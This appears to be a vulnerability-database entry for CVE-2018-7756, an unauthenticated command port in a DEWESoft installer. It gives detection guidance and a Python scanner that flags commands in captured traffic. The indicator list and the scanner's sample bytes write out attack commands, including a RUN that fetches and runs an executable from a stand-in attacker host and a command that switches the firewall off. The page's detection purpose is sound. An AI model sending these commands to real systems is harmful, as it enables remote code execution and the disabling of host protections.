CVE-2018-7756
published 2018-03-15


Priority: P181, critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 62.47% (99.1th percentile)
RunExeFile.exe in the installer for DEWESoft X3 SP1 (64-bit) devices does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that launches a .EXE file located at an arbitrary external URL, or a "SETFIREWALL Off" command.

Affected

1 range
Vendor | Product | Version range | Fixed in
dewesoft | dewesoft | |

Detection & IOCs (extracted from sources)

port: TCP/1999
filename: RunExeFile.exe
path: C:\Program Files (x86)\Common Files\DEWESoft Shared\
filename: DEWESoft_FULL_X3_SP1_64BIT.exe
command: RUN calc.exe
command: RUN http://ATTACKER-IP/DOOM.exe
command: runexe c:\Users\victim\Downloads\DOOM.exe
command: SETFIREWALL Off
  • Monitor for unauthenticated TCP connections to port 1999 on hosts running DEWESoft X3 SP1; any inbound session should be treated as suspicious given no authentication is required.
  • Alert on known internal commands (RUN, RUNEX, GETFIREWALL, SETFIREWALL, KILL, USERNAME, SHUTDOWN, SENDKEYS, LIST, DWPIPE) transmitted over TCP/1999 to detect exploitation attempts.
  • Detect process execution of RunExeFile.exe spawning child processes or making outbound HTTP/S connections to external URLs, which indicates the RUN command being abused to download and execute remote payloads.
  • Flag SETFIREWALL Off commands on TCP/1999 as a high-severity indicator of an attacker disabling host firewall protections via the RunExeFile.exe interface.
  • The vulnerable component RunExeFile.exe is installed only when using the full installer; partial or custom installs may not deploy it to the default shared path.
  • The internal command set of RunExeFile.exe is undocumented by the vendor, meaning the full attack surface beyond the demonstrated commands may be broader than what is publicly known.
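
The command-matching checks above can be prototyped offline against captured client-to-server bytes on TCP/1999. The following is an added example, not code from this page or from the vendor. It assumes the commands travel as line-oriented text and are matched case-insensitively; the function names `classify` and `scan_session` and the sample session are constructed for illustration.

```python
import re

# Verbs listed in this page's detection notes and IOC list.
RUN_VERBS = {"RUN", "RUNEX", "RUNEXE"}
OTHER_VERBS = {"GETFIREWALL", "SETFIREWALL", "KILL", "USERNAME",
               "SHUTDOWN", "SENDKEYS", "LIST", "DWPIPE"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def classify(line):
    """Return (severity, reason) for one payload line, or None if no listed verb."""
    parts = line.strip().split(None, 1)
    if not parts:
        return None
    verb = parts[0].upper()
    arg = parts[1].strip() if len(parts) > 1 else ""
    if verb in RUN_VERBS:
        if URL_RE.match(arg):
            return ("high", f"{verb} of a remotely hosted file")
        return ("medium", f"{verb} process launch")
    if verb == "SETFIREWALL" and arg.lower() == "off":
        return ("high", "SETFIREWALL Off request")
    if verb in OTHER_VERBS:
        return ("medium", f"internal command {verb}")
    return None


def scan_session(payload, src):
    """Scan bytes a client sent to TCP/1999 and return a list of alert dicts."""
    text = payload.decode("latin-1")  # latin-1 maps every byte, so this never raises
    alerts = []
    for line in re.split(r"[\r\n]+", text):
        hit = classify(line)
        if hit:
            alerts.append({"src": src, "severity": hit[0], "reason": hit[1],
                           "line": line.strip()})
    if not alerts:
        # The service has no authentication, so any inbound session is still notable.
        alerts.append({"src": src, "severity": "low", "line": "",
                       "reason": "inbound TCP/1999 session, no listed command"})
    return alerts


# Constructed sample: client-to-server bytes built from the commands quoted on this page.
SAMPLE = b"RUN calc.exe\r\nRUN http://ATTACKER-IP/DOOM.exe\r\nsetfirewall off\r\n"

if __name__ == "__main__":
    for alert in scan_session(SAMPLE, "192.0.2.10"):  # documentation address
        print(alert["severity"], alert["src"], alert["reason"], "|", alert["line"])
```

Because the vendor does not document the command set, a session with no listed verb is still reported at low severity rather than dropped.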

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C